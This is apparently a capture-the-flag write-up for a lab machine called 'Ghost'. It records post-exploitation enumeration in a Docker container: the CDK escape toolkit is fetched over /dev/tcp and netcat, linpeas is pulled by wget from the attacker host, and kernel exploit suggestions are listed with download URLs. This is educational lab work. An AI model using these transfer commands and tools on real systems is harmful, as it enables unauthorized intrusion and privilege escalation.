Ghost_Automated_Docker_Container

CDK - Zero Dependency Container Penetration Toolkit

---

Conducting an automated enumeration after performing the manual enumeration

cdk is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < cdk
listening on [any] 2222 ...
connect to [10.10.14.58] from dc01.ghost.htb [10.10.11.24] 61044
 
root@621de11273cb:~# cat < /dev/tcp/10.10.14.58/2222 > cdk

Delivery complete

root@621de11273cb:~# chmod 755 cdk 
root@621de11273cb:~# ./cdk eva --full
./cdk eva --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2024/07/15 22:26:17 current dir: /root
2024/07/15 22:26:17 current user: root uid: 0 gid: 0 home: /root
2024/07/15 22:26:17 hostname: 621de11273cb
2024/07/15 22:26:17 debian debian 12.6 kernel: 5.15.0-113-generic
2024/07/15 22:26:17 Setuid files found:
	/usr/sbin/exim4
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/mount
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/su
	/usr/bin/umount
	/sbin/exim4
	/bin/chfn
	/bin/chsh
	/bin/gpasswd
	/bin/mount
	/bin/newgrp
	/bin/passwd
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2024/07/15 22:26:17 service found in process:
	20	1	ssh
2024/07/15 22:26:17 service found in process:
	21	1	ssh
2024/07/15 22:26:17 service found in process:
	1146	1144	python3
2024/07/15 22:26:17 service found in process:
	1215	1147	ssh
 
[  Information Gathering - Commands and Capabilities  ]
2024/07/15 22:26:17 available commands:
	curl,wget,find,ps,python3,apt,dpkg,ssh,git,svn,mount,gcc,g++,make,base64,perl
2024/07/15 22:26:17 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	00000000a80425fb
	CapEff:	00000000a80425fb
	CapBnd:	00000000a80425fb
	CapAmb:	0000000000000000
	Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:
 
[  Information Gathering - Mounts  ]
0:49 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/OUXOG24Z2PTTMPPFUJJGUPYC5C:/var/lib/docker/overlay2/l/OUMACUJZSOBMTOOCBCU2TAIUIM:/var/lib/docker/overlay2/l/34KT2FTDQPDKGOQXFZTTK2WC6E:/var/lib/docker/overlay2/l/7M55USJHXPAZETBOTUA244DTCB:/var/lib/docker/overlay2/l/GENV37QCN67KBDJIXSB26LRU5W:/var/lib/docker/overlay2/l/75NCT7SAV5UGG5LAVQEUPBPUCG:/var/lib/docker/overlay2/l/LLTSLSD7ZD3UD6M5NGZ62OUNEO:/var/lib/docker/overlay2/l/LQX6MENKLII2G6RWKFPMJQPFGJ:/var/lib/docker/overlay2/l/7DUUI4ESJBRE3RONRKAZCD4XEP:/var/lib/docker/overlay2/l/XFX2DH67VUIB7PANFIAKTREGZX:/var/lib/docker/overlay2/l/LMDGBSZKR5BNBZPJWPGEBQ2BFX:/var/lib/docker/overlay2/l/LDXSULCHALJNL5MKW7EJWIIFMH:/var/lib/docker/overlay2/l/RITJUYCNNRP5E354NXU6U66KAN:/var/lib/docker/overlay2/l/Y4W4JTSH5SKHDXHLPZAKXWXNLU,upperdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/diff,workdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/work
0:85 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:86 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:87 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:88 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:62 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:89 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,nr_inodes=219662,inode64
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:85 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:95 / /proc/acpi ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:86 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:86 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:86 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:96 / /proc/scsi ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:97 / /sys/firmware ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:98 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2024/07/15 22:26:17 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2024/07/15 22:26:17 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2024/07/15 22:26:18 failed to dial Alibaba Cloud API.
2024/07/15 22:26:19 failed to dial Azure API.
2024/07/15 22:26:20 failed to dial Google Cloud API.
2024/07/15 22:26:21 failed to dial Tencent Cloud API.
2024/07/15 22:26:22 failed to dial OpenStack API.
2024/07/15 22:26:23 failed to dial Amazon Web Services (AWS) API.
2024/07/15 22:26:24 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2024/07/15 22:26:24 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
	/.bash_history - /root/.bash_history
	/.bashrc - /root/.bashrc
	/.ssh/ - /root/.ssh/config
	/.ssh/ - /root/.ssh/controlmaster
	/.ssh/ - /root/.ssh/known_hosts
	/.ssh/ - /root/.ssh/known_hosts.old
 
[  Information Gathering - ASLR  ]
2024/07/15 22:26:27 /proc/sys/kernel/randomize_va_space file content: 2
2024/07/15 22:26:27 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2024/07/15 22:26:27 /proc/1/cgroup file content:
	0::/
2024/07/15 22:26:27 /proc/self/cgroup file added content (compare pid 1) :

root@621de11273cb:~# ./cdk ifconfig
./cdk ifconfig
2024/07/15 22:27:48 [+] run ifconfig, using GetLocalAddresses()
2024/07/15 22:27:48 lo 127.0.0.1/8
2024/07/15 22:27:48 lo ::1/128
2024/07/15 22:27:48 eth0 172.18.0.3/16
 
root@621de11273cb:~# ./cdk netstat
./cdk netstat
2024/07/15 22:28:09 [+] run netstat, using RunNestat()
ipType		connection	localAddr			status			remoteAddr			pid
ipv4		tcp		0.0.0.0:8000    		LISTEN       		0.0.0.0:0       		1
ipv4		tcp		127.0.0.11:39837		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		172.18.0.3:34692		ESTABLISHED  		10.10.14.58:9999		1973
ipv4		tcp		172.18.0.3:55090		ESTABLISHED  		172.18.0.2:22   		21
ipv4		tcp		172.18.0.3:43910		CLOSE_WAIT   		10.10.16.79:1234		1142
ipv4		udp		127.0.0.11:57612		NONE         		0.0.0.0:0       		0

PEAS

---

Conducting an automated enumeration after performing the manual enumeration

root@621de11273cb:~# wget http://10.10.14.58/linpeas_CVE_check.sh 
--2024-07-15 22:30:23--  http://10.10.14.58/linpeas_CVE_check.sh
Connecting to 10.10.14.58:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: 'linpeas_CVE_check.sh'
 
linpeas_CVE_check.sh 100%[===================>] 808.76K  3.64MB/s    in 0.2s    
 
2024-07-15 22:30:24 (3.64 MB/s) - 'linpeas_CVE_check.sh' saved [828172/828172]

Delivery complete

Container

---

Files

---

╔══════════╣ Interesting Files Mounted
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OUXOG24Z2PTTMPPFUJJGUPYC5C:/var/lib/docker/overlay2/l/OUMACUJZSOBMTOOCBCU2TAIUIM:/var/lib/docker/overlay2/l/34KT2FTDQPDKGOQXFZTTK2WC6E:/var/lib/docker/overlay2/l/7M55USJHXPAZETBOTUA244DTCB:/var/lib/docker/overlay2/l/GENV37QCN67KBDJIXSB26LRU5W:/var/lib/docker/overlay2/l/75NCT7SAV5UGG5LAVQEUPBPUCG:/var/lib/docker/overlay2/l/LLTSLSD7ZD3UD6M5NGZ62OUNEO:/var/lib/docker/overlay2/l/LQX6MENKLII2G6RWKFPMJQPFGJ:/var/lib/docker/overlay2/l/7DUUI4ESJBRE3RONRKAZCD4XEP:/var/lib/docker/overlay2/l/XFX2DH67VUIB7PANFIAKTREGZX:/var/lib/docker/overlay2/l/LMDGBSZKR5BNBZPJWPGEBQ2BFX:/var/lib/docker/overlay2/l/LDXSULCHALJNL5MKW7EJWIIFMH:/var/lib/docker/overlay2/l/RITJUYCNNRP5E354NXU6U66KAN:/var/lib/docker/overlay2/l/Y4W4JTSH5SKHDXHLPZAKXWXNLU,upperdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/diff,workdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
size=65536k,nr_inodes=219662,inode64),nodev,noexec,relatime,
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/scsi type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /sys/firmware type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /sys/devices/virtual/powercap type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)

DNS

---